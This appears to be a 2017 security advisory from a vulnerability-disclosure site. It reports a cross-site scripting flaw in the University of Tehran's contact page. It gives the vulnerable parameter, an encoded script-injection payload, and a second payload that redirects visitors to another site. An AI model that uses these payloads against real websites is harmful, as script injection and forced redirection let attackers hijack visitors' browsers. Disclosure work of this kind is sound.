University of Tehran Cross-Site-Scripting Vulnerability

2017.08.22
Credit: 4TT4CK3R
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

The University of Tehran, also known as Tehran University and UT, is Iran's oldest modern university. It is also Iran's most prestigious university. Based on its historical, socio-cultural, and political pedigree, as well as its research and teaching profile, UT has been nicknamed "The mother university of Iran" and it is the symbol of higher education in Iran. It is almost always ranked as the best university in Iran in national and international rankings. [+] In the name of god [+] Exploit Title : University of Tehran Cross-Site-Scripting Vulnerability [+] Exploit Author : 4TT4CK3R [+] Tested on : All Platforms [+] Date : 2017/08/23 [+] Home Page : http://ut.ac.ir/ [+] Some Info : [--]4TT4CK3R@GrayBoy:~$ curl -I http://ut.ac.ir [--]HTTP/1.1 302 Found [--]Date: Mon, 21 Aug 2017 15:02:36 GMT [--]Server: Apache/2.4.7 (Ubuntu) [--]Accept-Ranges: bytes [--]X-Powered-By: PHP/5.5.9-1ubuntu4.22 [--]Location: http://ut.ac.ir/fa [--]Cache-Control: max-age=0 [--]Expires: Mon, 21 Aug 2017 15:02:36 GMT [--]Content-Type: text/html; charset=UTF-8 [--]Connection: close [+] Vulnerable Page : http://ut.ac.ir/fa/contactus [+] Parameter for request : recipientid [+] Payload : %22%22/%3E%3C%3C/ScrIpt%3E%3Cscript%3Ealert(%274TT4CK3R%27)%3C/script%3E [+] Redirection : And also we can redirect target to another website : [--] ""/><</ScrIpt><script>window.location="https://google.com";</script> [+] ScreenShot : http://uupload.ir/files/2iyw_1.png [+] Discovered by : 4TT4CK3R [++] This vulnerability reported to the target.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top